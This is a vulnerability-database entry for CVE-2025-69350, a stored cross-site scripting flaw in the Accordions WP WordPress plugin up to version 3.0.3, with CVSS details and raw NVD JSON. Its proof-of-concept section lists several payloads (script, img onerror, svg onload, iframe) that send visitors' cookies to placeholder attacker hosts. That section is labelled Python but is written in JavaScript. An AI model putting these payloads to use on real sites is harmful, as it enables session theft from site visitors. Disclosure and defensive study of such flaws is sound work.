Security Vulnerability Report
中文
CVE-2025-69350 CVSS 5.9 MEDIUM

CVE-2025-69350

Published: 2026-01-06 17:15:47
Last Modified: 2026-04-27 19:16:41

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themepoints Accordion accordions-wp allows Stored XSS.This issue affects Accordion: from n/a through <= 3.0.3.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Accordions WP <= 3.0.3 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-69350 PoC - Stored XSS in WordPress Accordion Plugin // Target: accordions-wp plugin <= 3.0.3 // Author: Patchstack // Step 1: Access WordPress admin panel and navigate to Accordion plugin settings // Step 2: Create or edit an accordion with the following payload in title or content field: const xssPayload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'; // Step 3: Save the accordion // Step 4: Any user visiting the page containing this accordion will have their cookies stolen // Example JavaScript payload for cookie theft: const cookieStealPoc = ` <script> fetch('https://attacker-controlled-site.com/log?cookie=' + encodeURIComponent(document.cookie)); </script> `; // Alternative payloads: const alternativePayloads = [ '<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">', '<svg onload="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">', '<iframe src="javascript:fetch(\'https://attacker.com/steal?c=\'+document.cookie)">' ]; // Exploitation notes: // - Requires admin/editor privileges to inject payload // - Payload persists in database until manually removed // - All visitors to affected pages are victims

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69350", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:47.463", "lastModified": "2026-04-27T19:16:41.280", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themepoints Accordion accordions-wp allows Stored XSS.This issue affects Accordion: from n/a through <= 3.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/accordions-wp/vulnerability/wordpress-accordion-plugin-3-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}